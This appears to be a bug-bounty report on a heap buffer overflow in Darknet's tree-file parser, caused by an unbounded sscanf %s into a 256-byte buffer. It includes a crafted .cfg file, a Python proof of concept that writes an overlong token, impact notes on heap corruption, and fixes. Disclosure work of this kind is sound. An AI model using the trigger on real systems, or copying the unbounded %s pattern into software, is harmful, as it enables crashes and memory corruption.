Heap-Based Buffer Overflow via Unbounded sscanf %s in Tree File Parsing

Target

  • Repository: hank-ai/darknet (v3 / current main)
  • Bounty Program: huntr.com -- Model Format ($1,500)
  • Vulnerability Type: Heap-Based Buffer Overflow (CWE-120)
  • Severity: HIGH
  • CVSS 3.1: ~7.8

Summary

When Darknet loads a .cfg file whose [region] section specifies tree=<filename>, the referenced tree file is parsed by Darknet::read_tree() in tree.cpp. This function calls sscanf(line, "%s %d", id, &parent), where id is a heap buffer of only 256 bytes. Because the %s conversion carries no maximum field width, any line whose first token is longer than 255 characters overflows the id buffer and corrupts adjacent heap memory.

Affected Code

File: src-lib/tree.cpp (lines 88-91)

while((line=fgetl(fp)) != 0){
    char* id = (char*)xcalloc(256, sizeof(char));   // 256-byte heap allocation
    int parent = -1;
    sscanf(line, "%s %d", id, &parent);             // %s has NO width limit!
    ...
    t.name[n] = id;                                  // overflowed buffer kept in use

The fgetl() function reallocates its buffer to read lines of arbitrary length (it starts at 512 bytes and doubles as needed), so a tree file line can be megabytes long. The sscanf %s conversion then writes the entire first whitespace-delimited token, plus a terminating NUL byte, into the 256-byte id buffer.
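
The arithmetic behind the overflow can be sketched without triggering it. The helpers below are hypothetical (they are not part of Darknet) and only compute how many bytes an unbounded %s conversion would store for a given line, assuming the 256-byte allocation shown in the excerpt and the whitespace set of the "C" locale.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

// Size of the `id` allocation in the excerpt above.
constexpr std::size_t kIdBufferSize = 256;

// Hypothetical helper: number of bytes an unbounded "%s" conversion would
// store for `line`, i.e. the first whitespace-delimited token plus the NUL
// terminator. Returns 0 when the line holds no token at all.
std::size_t bytes_stored_by_unbounded_s(const char* line) {
    assert(line != nullptr);
    const char* ws = " \t\n\v\f\r";                    // whitespace in the "C" locale
    const char* token = line + std::strspn(line, ws);  // "%s" skips leading whitespace
    std::size_t token_len = std::strcspn(token, ws);   // token ends at whitespace or NUL
    return token_len == 0 ? 0 : token_len + 1;
}

// Bytes written past the end of the 256-byte buffer (0 if the token fits).
std::size_t overflow_bytes(const char* line) {
    std::size_t stored = bytes_stored_by_unbounded_s(line);
    return stored > kIdBufferSize ? stored - kIdBufferSize : 0;
}
```

A 255-character token is the largest that fits, since the terminator takes the last byte; every additional character lands outside the allocation.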

Exploitation

Attack Chain

  1. Attacker creates a malicious .cfg file with a [region] section:

    [net]
    width=416
    height=416
    channels=3
    
    [convolutional]
    filters=30
    size=1
    stride=1
    pad=1
    activation=linear
    
    [region]
    classes=20
    num=5
    tree=malicious_tree.txt
    
  2. The malicious_tree.txt file contains a line whose first token is longer than 255 characters:

    AAAAAAAAAAAAAAAA....[300+ chars]....AAAA 0
    
  3. When parse_region_section() calls read_tree() (via l.softmax_tree = read_tree(tree_file.c_str())), the sscanf writes 300+ bytes into a 256-byte heap buffer.

Proof-of-Concept Tree File

# generate_malicious_tree.py
with open("malicious_tree.txt", "w") as f:
    # First token is 512 characters; with the NUL terminator, sscanf stores
    # 513 bytes and overflows the 256-byte buffer by 257 bytes
    f.write("A" * 512 + " 0\n")
    f.write("B 0\n")
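
A tree file like the one generated above could be flagged before it ever reaches the parser. The following is a minimal sketch of such a pre-flight check; find_overlong_tree_lines and its buffer_size parameter are hypothetical names introduced here for illustration, and the default of 256 is taken from the allocation shown in the affected code.

```cpp
#include <cstddef>
#include <istream>
#include <sstream>
#include <string>
#include <vector>

// Hypothetical pre-flight check, not part of Darknet: returns the 1-based
// numbers of all lines whose first whitespace-delimited token would not fit
// in a buffer of `buffer_size` bytes (token characters plus NUL terminator).
std::vector<std::size_t> find_overlong_tree_lines(std::istream& in,
                                                  std::size_t buffer_size = 256) {
    std::vector<std::size_t> bad_lines;
    std::string line;
    std::size_t line_no = 0;
    while (std::getline(in, line)) {
        ++line_no;
        std::istringstream iss(line);
        std::string token;
        // std::string grows as needed, so reading the token here is safe
        // regardless of its length.
        if (iss >> token && token.size() + 1 > buffer_size) {
            bad_lines.push_back(line_no);
        }
    }
    return bad_lines;
}
```

Run against the proof-of-concept file, this sketch would report line 1 only, since the second line ("B 0") fits comfortably.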

Impact

  • Heap Corruption: The overflow writes past the 256-byte id buffer, corrupting adjacent heap metadata and objects.
  • Denial of Service: Heap corruption typically leads to a crash, although the exact outcome depends on the allocator and the heap layout.
  • Potential Code Execution: The overwritten heap memory may include:
    • Heap chunk metadata (enabling heap exploitation techniques)
    • Previously allocated t.parent, t.name, t.group_offset, or t.group_size arrays (which are repeatedly xrealloc'd in the same loop)
    • Function pointers or other sensitive data
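  • The attacker controls both the length and the content of the overflow, with one constraint: the bytes cannot include whitespace or NUL, because %s stops at the first whitespace character.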

Fix

Use a width-limited format specifier in the sscanf call:

// BEFORE (vulnerable):
sscanf(line, "%s %d", id, &parent);

// AFTER (fixed):
sscanf(line, "%255s %d", id, &parent);  // limit to 255 chars + null terminator

Or better yet, replace with C++ string parsing:

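// requires <sstream> and <string>
std::istringstream iss(line);
std::string id_str;
int parent = -1;
if (!(iss >> id_str >> parent)) {
    // A non-numeric second field makes operator>> store 0 (C++11 and later),
    // whereas sscanf would have left parent untouched; restore the default.
    parent = -1;
}
// t.name[n] keeps a char*, so copy id_str into storage that outlives this
// iteration; a pointer from id_str.c_str() dangles once id_str is destroyed.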
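
The stream-based approach can be wrapped so that it keeps the conventions of the original call. The sketch below is an assumption about how that might look, not Darknet code: parse_tree_line and duplicate_id are hypothetical names, the return value mimics sscanf's count of converted fields, and std::malloc stands in for whatever allocator the project would actually use.

```cpp
#include <cstdlib>
#include <cstring>
#include <sstream>
#include <string>

// Hypothetical replacement for the sscanf call. Returns the number of fields
// converted (0, 1 or 2), like sscanf. `parent` is left at -1 unless a valid
// integer follows the id.
int parse_tree_line(const char* line, std::string& id, int& parent) {
    id.clear();
    parent = -1;
    std::istringstream iss(line);
    if (!(iss >> id)) {
        return 0;  // empty or whitespace-only line
    }
    int value = 0;
    if (!(iss >> value)) {
        return 1;  // id only; parent keeps its default of -1
    }
    parent = value;
    return 2;
}

// Hypothetical helper: heap copy of the id sized to fit, for storage in a
// char* slot such as t.name[n]. Returns nullptr if allocation fails; the
// caller owns the result and releases it with std::free.
char* duplicate_id(const std::string& id) {
    char* copy = static_cast<char*>(std::malloc(id.size() + 1));
    if (copy != nullptr) {
        std::memcpy(copy, id.c_str(), id.size() + 1);  // includes the NUL
    }
    return copy;
}
```

Because the copy is sized from the parsed token, no fixed 256-byte limit remains; whether overlong ids should be accepted or rejected outright is a policy decision left to the caller.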

References

  • CWE-120: Buffer Copy without Checking Size of Input (Classic Buffer Overflow)
  • CWE-787: Out-of-bounds Write
  • CWE-134: Use of Externally-Controlled Format String (a related class of format-function misuse; the format string in this finding is constant)